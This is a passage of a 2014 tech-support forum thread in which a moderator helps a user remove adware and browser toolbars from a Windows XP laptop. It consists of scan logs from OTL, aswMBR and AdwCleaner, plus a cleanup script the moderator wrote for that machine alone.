[2012/06/24 20:13:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Dropbox
[2012/06/29 13:34:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Free Sound Recorder
[2012/05/18 17:44:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\FreeAudioPack
[2011/09/29 14:17:19 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\FUJIFILM
[2012/01/15 23:05:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\IDoser
[2013/03/22 16:44:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw
[2013/03/08 23:14:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Image Zone Express
[2012/07/27 19:14:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\MakeMusic
[2011/10/05 17:24:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\NetAssistant
[2012/06/07 21:39:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Quark
[2012/06/09 13:26:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Recordpad
[2013/03/22 16:43:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\searchresultstb
[2012/06/29 19:48:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Sony
[2012/06/07 15:37:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Visan
[2012/05/16 18:35:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Wondershare Video Converter Platinum
[2012/05/16 18:56:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Wondershare Video Converter Ultimate
[2012/05/16 10:06:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Clone2go
[2013/09/01 21:38:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\InstallMate
[2012/07/27 19:14:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MakeMusic
[2012/06/07 21:39:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Quark
[2013/09/01 22:05:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\saveansHare
[2012/06/30 17:04:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2012/06/29 19:46:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Toontrack
[2012/06/07 15:37:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Visan
[2013/09/23 14:21:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Wincert
[2012/05/18 22:43:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Wondershare
[2013/10/20 17:59:17 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\ZalmanInstaller_52330

========== Purity Check ==========



========== Custom Scans ==========

< BASESERVICES >

< %SYSTEMDRIVE%\*.exe >

< c:\program files (x86)\Google\Desktop >

< c:\program files\Google\Desktop >

< dir "%systemdrive%\*" /S /A:L /C >
Volume in drive C has no label.
Volume Serial Number is 44DD-BF05
Directory of C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices
07/09/2013 09:49 PM <JUNCTION> 2.0.0.0__b03f5f7f11d50a3a
0 File(s) 0 bytes
Directory of C:\WINDOWS\assembly\GAC_MSIL\IEExecRemote
07/09/2013 09:49 PM <JUNCTION> 2.0.0.0__b03f5f7f11d50a3a
0 File(s) 0 bytes
Directory of C:\WINDOWS\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices
11/14/2011 10:45 PM <JUNCTION> v4.0_4.0.0.0__b03f5f7f11d50a3a
0 File(s) 0 bytes
Directory of C:\WINDOWS\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler
11/14/2011 10:49 PM <JUNCTION> v4.0_4.0.0.0__31bf3856ad364e35
0 File(s) 0 bytes
Total Files Listed:
0 File(s) 0 bytes
4 Dir(s) 54,497,255,424 bytes free

< MD5 for: RPCSS.DLL >
[2008/04/14 07:00:00 | 000,399,360 | ---- | M] (Microsoft Corporation) MD5=2589FE6015A316C0F5D5112B4DA7B509 -- C:\WINDOWS\system32\dllcache\rpcss.dll
[2008/04/14 07:00:00 | 000,399,360 | ---- | M] (Microsoft Corporation) MD5=2589FE6015A316C0F5D5112B4DA7B509 -- C:\WINDOWS\system32\rpcss.dll

========== Alternate Data Streams ==========

@Alternate Data Stream - 127 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:430C6D84
@Alternate Data Stream - 124 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:80337C03
@Alternate Data Stream - 109 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:DFC5A2B2

< End of report >



aswMBR version 0.9.9.1771 Copyright© 2011 AVAST Software
Run date: 2014-01-14 18:56:10
-----------------------------
18:56:10.500 OS Version: Windows 5.1.2600 Service Pack 3
18:56:10.500 Number of processors: 2 586 0xE08
18:56:10.500 ComputerName: LATITUDED620 UserName:
18:56:12.484 Initialize success
18:56:42.359 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
18:56:42.390 Disk 0 Vendor: Hitachi_HTS543280L9A300 FB1OC40C Size: 76319MB BusType: 3
18:56:42.562 Disk 0 MBR read successfully
18:56:42.578 Disk 0 MBR scan
18:56:42.609 Disk 0 Windows XP default MBR code
18:56:42.640 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 76319 MB offset 63
18:56:42.671 Disk 0 scanning sectors +156301488
18:56:43.328 Disk 0 scanning C:\WINDOWS\system32\drivers
18:56:48.359 Service scanning
18:56:53.421 Service MpKsl31a7b661 c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{D3383493-0812-4DBF-9122-2E0F0286D42F}\MpKsl31a7b661.sys **LOCKED** 32
18:56:59.656 Modules scanning
18:57:05.281 Disk 0 trace - called modules:
18:57:05.359 ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
18:57:05.375 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x864e7ab8]
18:57:06.343 3 CLASSPNP.SYS[f75fefd7] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-3[0x865a74d0]
18:57:06.390 Scan finished successfully
18:57:29.312 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Administrator\Desktop\MBR.dat"
18:57:29.343 The log file has been saved successfully to "C:\Documents and Settings\Administrator\Desktop\aswMBR.txt"
  • 0

#4
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
OK I can see the problem, could you not use Firefox until these runs have completed

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.

THEN

Please download Junkware Removal Tool to your desktop.
  • Right-mouse click JRT.exe and select "Run as Administrator" the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • post the contents of JRT.txt into your next message.

FINALLY

Warning This fix is only relevant for this system and no other, using on another computer may cause problems

Be advised that when the fix commences it will shut down all running processes and you may lose the desktop and icons, they will return on reboot

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following
    Posted Image
:Commands
[CREATERESTOREPOINT]

:OTL
[2013/09/01 23:06:12 | 000,000,000 | ---D | M] (saveansHare) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\[email protected]
[2014/02/03 16:26:40 | 000,001,635 | ---- | M] () -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\ixquick-https.xml
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKU\S-1-5-21-515967899-1604221776-1417001333-500\..\Toolbar\WebBrowser: (no name) - {472734EA-242A-422B-ADF8-83D1E48CC825} - No CLSID value found.
O20 - AppInit_DLLs: (c:\progra~1\search~1\datamngr\datamngr.dll) - File not found
[2013/03/22 16:44:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw
[2013/09/01 22:05:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\saveansHare

:Commands
[resethosts]
[emptytemp]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Open OTL again and click the Quick Scan button. Post the log it produces in your next reply.

  • 0

#5
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
JRT.exe is denying access even when I try to
run it as Administrator.
I even tried a re-download.

Edited by monkeyboyblues, 15 January 2014 - 04:20 PM.

  • 0

#6
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Continue to the next stage and post the relevant logs please
  • 0

#7
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
aswMBR version 0.9.9.1771 Copyright© 2011 AVAST Software
Run date: 2014-01-14 18:56:10
-----------------------------
18:56:10.500 OS Version: Windows 5.1.2600 Service Pack 3
18:56:10.500 Number of processors: 2 586 0xE08
18:56:10.500 ComputerName: LATITUDED620 UserName:
18:56:12.484 Initialize success
18:56:42.359 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
18:56:42.390 Disk 0 Vendor: Hitachi_HTS543280L9A300 FB1OC40C Size: 76319MB BusType: 3
18:56:42.562 Disk 0 MBR read successfully
18:56:42.578 Disk 0 MBR scan
18:56:42.609 Disk 0 Windows XP default MBR code
18:56:42.640 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 76319 MB offset 63
18:56:42.671 Disk 0 scanning sectors +156301488
18:56:43.328 Disk 0 scanning C:\WINDOWS\system32\drivers
18:56:48.359 Service scanning
18:56:53.421 Service MpKsl31a7b661 c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{D3383493-0812-4DBF-9122-2E0F0286D42F}\MpKsl31a7b661.sys **LOCKED** 32
18:56:59.656 Modules scanning
18:57:05.281 Disk 0 trace - called modules:
18:57:05.359 ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
18:57:05.375 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x864e7ab8]
18:57:06.343 3 CLASSPNP.SYS[f75fefd7] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-3[0x865a74d0]
18:57:06.390 Scan finished successfully
18:57:29.312 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Administrator\Desktop\MBR.dat"
18:57:29.343 The log file has been saved successfully to "C:\Documents and Settings\Administrator\Desktop\aswMBR.txt"


All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Folder C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\[email protected]\ not found.
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\ixquick-https.xml moved successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\10 deleted successfully.
Registry value HKEY_USERS\S-1-5-21-515967899-1604221776-1417001333-500\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{472734EA-242A-422B-ADF8-83D1E48CC825} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{472734EA-242A-422B-ADF8-83D1E48CC825}\ not found.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_Dlls:c:\progra~1\search~1\datamngr\datamngr.dll deleted successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\widgets\net.vmn.www.RadioBeta folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\widgets folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\net.vmn.www.RadioBeta folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\content\widgets\net.vmn.www.RadioBeta folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\content\widgets folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome\content folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw\chrome folder moved successfully.
C:\Documents and Settings\Administrator\Application Data\ilividtoolbargaw folder moved successfully.
Folder C:\Documents and Settings\All Users\Application Data\saveansHare\ not found.
========== COMMANDS ==========
C:\WINDOWS\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 693996814 bytes
->Temporary Internet Files folder emptied: 84981709 bytes
->FireFox cache emptied: 185764288 bytes
->Flash cache emptied: 88938 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33936 bytes

User: NetworkService
->Temp folder emptied: 76200184 bytes
->Temporary Internet Files folder emptied: 33170 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 317995748 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 1132648265 bytes

Total Files Cleaned = 2,376.00 mb


OTL by OldTimer - Version 3.2.53.0 log created on 01162014_152145

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • 0

#8
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Did AdwCleaner run ? If so could you post the log

Also could I have a fresh OTL scan please
  • 0

#9
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
# AdwCleaner v3.017 - Report created 15/01/2014 at 16:53:55
# Updated 12/01/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Administrator - LATITUDED620
# Running from : C:\Documents and Settings\Administrator\My Documents\Downloads\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

File Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\MyStart Search.xml
File Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\Search_Results.xml
File Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\user.js
File Found : C:\END
File Found : C:\Program Files\Mozilla Firefox\searchplugins\Search_Results.xml
File Found : C:\WINDOWS\system32\ImhxxpComm.dll
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{32b29df0-2237-4370-9a29-37cebb730e9b}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{32b29df0-2237-4370-9a29-37cebb730e9b}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{32b29df0-2237-4370-9a29-37cebb730e9b}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{377e5d4d-77e5-476a-8716-7e70a9272da0}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{377e5d4d-77e5-476a-8716-7e70a9272da0}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{377e5d4d-77e5-476a-8716-7e70a9272da0}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\[email protected]
Folder Found : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Extensions\[email protected]
Folder Found C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\CT2704262
Folder Found C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Searchqutoolbar
Folder Found C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\Smartbar
Folder Found C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\ValueApps
Folder Found C:\Documents and Settings\Administrator\Application Data\NCH Software
Folder Found C:\Documents and Settings\Administrator\Application Data\searchresultstb
Folder Found C:\Documents and Settings\Administrator\Local Settings\Application Data\Babylon
Folder Found C:\Documents and Settings\Administrator\Local Settings\Application Data\Ilivid Player
Folder Found C:\Documents and Settings\All Users\Application Data\NCH Software
Folder Found C:\Documents and Settings\All Users\Application Data\saveansHare
Folder Found C:\Documents and Settings\All Users\Application Data\saveansHare
Folder Found C:\Documents and Settings\All Users\Application Data\wincert
Folder Found C:\Program Files\Free Offers from Freeze.com
Folder Found C:\Program Files\NCH Software
Folder Found C:\Program Files\Search Results Toolbar
Folder Found C:\WINDOWS\system32\ARFC
Folder Found C:\WINDOWS\system32\jmdp
Folder Found C:\WINDOWS\system32\WNLT

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\APN DTX
Key Found : HKCU\Software\Conduit
Key Found : HKCU\Software\Cr_Installer
Key Found : HKCU\Software\ilivid
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\ImInstaller
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{98889811-442D-49DD-99D7-DC866BE87DBC}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2EECD738-5844-4A99-B4B6-146BF802613B}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{98889811-442D-49DD-99D7-DC866BE87DBC}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}
Key Found : HKCU\Software\NCH Software
Key Found : HKCU\Software\searchqutoolbar
Key Found : HKCU\Software\SmartBar
Key Found : HKLM\Software\Babylon
Key Found : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\AppID\{AC662AF2-4601-4A68-84DF-A3FE83F1A5F9}
Key Found : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D97A8234-F2A2-4AD4-91D5-FECDB2C553AF}
Key Found : HKLM\SOFTWARE\Classes\AppID\BrowserConnection.dll
Key Found : HKLM\SOFTWARE\Classes\AppID\DNSBHO.dll
Key Found : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Found : HKLM\SOFTWARE\Classes\Applications\ilividsetup.exe
Key Found : HKLM\SOFTWARE\Classes\Applications\ilividsetupv1.exe
Key Found : HKLM\SOFTWARE\Classes\Babylon.dskBnd
Key Found : HKLM\SOFTWARE\Classes\Babylon.dskBnd.1
Key Found : HKLM\SOFTWARE\Classes\bbylnApp.appCore
Key Found : HKLM\SOFTWARE\Classes\bbylnApp.appCore.1
Key Found : HKLM\SOFTWARE\Classes\bbylntlbr.bbylntlbrHlpr
Key Found : HKLM\SOFTWARE\Classes\bbylntlbr.bbylntlbrHlpr.1
Key Found : HKLM\SOFTWARE\Classes\CLSID\{00000001-4FEF-40D3-B3FA-E0531B897F98}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{64697678-0000-0010-8000-00AA00389B71}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{97F2FF5B-260C-4CCF-834A-2DDA4E29E39E}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{CE4DB5A3-58E6-41F1-8761-47238DF4F468}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E46C8196-B634-44A1-AF6E-957C64278AB1}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{FE9271F2-6EFD-44B0-A826-84C829536E93}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{FFB9ADCB-8C79-4C29-81D3-74D46A93D370}
Key Found : HKLM\SOFTWARE\Classes\escort.escortIEPane
Key Found : HKLM\SOFTWARE\Classes\escort.escortIEPane.1
Key Found : HKLM\SOFTWARE\Classes\escort.escrtBtn.1
Key Found : HKLM\SOFTWARE\Classes\iLividIEHelper.DNSGuard
Key Found : HKLM\SOFTWARE\Classes\iLividIEHelper.DNSGuard.1
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4D5132DD-BB2B-4249-B5E0-D145A8C982E1}
Key Found : HKLM\SOFTWARE\Classes\Interface\{706D4A4B-184A-4434-B331-296B07493D2D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{8BE10F21-185F-4CA0-B789-9921674C3993}
Key Found : HKLM\SOFTWARE\Classes\Interface\{94C0B25D-3359-4B10-B227-F96A77DB773F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B0B75FBA-7288-4FD3-A9EB-7EE27FA65599}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B173667F-8395-4317-8DD6-45AD1FE00047}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B32672B3-F656-46E0-B584-FE61C0BB6037}
Key Found : HKLM\SOFTWARE\Classes\Interface\{BFE569F7-646C-4512-969B-9BE3E580D393}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C2434722-5C85-4CA0-BA69-1B67E7AB3D68}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C2996524-2187-441F-A398-CD6CB6B3D020}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E047E227-5342-4D94-80F7-CFB154BF55BD}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E3F79BE9-24D4-4F4D-8C13-DF2C9899F82E}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E77EEF95-3E83-4BB8-9C0D-4A5163774997}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Found : HKLM\SOFTWARE\Classes\Prod.cap
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{5B4144E1-B61D-495A-9A50-CD1A95D86D15}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{75E8DA27-44AF-40AE-927C-F2EEC99D65B1}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\Software\Conduit
Key Found : HKLM\Software\DataMngr
Key Found : HKLM\Software\Freeze.com
Key Found : HKLM\Software\iLividSRTB
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\I Want This
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Searchqu Toolbar
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\wnlt
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Key Found : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFA&SUBSYS_14F100C3
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Results Toolbar
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Searchqu Toolbar
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_8e303e95
Key Found : HKLM\Software\NCH Software
Key Found : HKLM\Software\SearchquMediabarTb
Key Found : HKLM\Software\SP Global
Key Found : HKLM\Software\SProtector
Key Found : HKLM\Software\Tarma Installer
Key Found : HKLM\Software\wnlt
Value Found : HKCU\Software\Microsoft\Internet Explorer\New Windows\Allow [*.crossrider.com]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\New Windows\Allow [*.crossrider.com]
Value Found : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Documents and Settings\Administrator\Local Settings\Temp\SweetIMSetup_20130903.exe]
Value Found : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files\Search Results Toolbar\Datamngr\SRTOOL~1\dtUser.exe]
Value Found : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files\Searchqu Toolbar\Datamngr\ToolBar\dtUser.exe]
Value Found : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\WINDOWS\system32\ARFC\wrtc.exe]

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702


-\\ Mozilla Firefox v26.0 (en-US)

[ File : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\prefs.js ]

Line Found : user_pref("CT2704262.1000082.isPlayDisplay", "true");
Line Found : user_pref("CT2704262.1000082.state", "{\"state\":\"stopped\",\"text\":\"Californi...\",\"description\":\"California Rock\",\"url\":\"hxxp://feedlive.net/california.asx\"}");
Line Found : user_pref("CT2704262.129738587603157113.APP_WIN_FEATURES", "openposition=offset:50;50,savelocation=0,resizable=no,scrollbars=no,titlebar=yes,saveresizedsize=no");
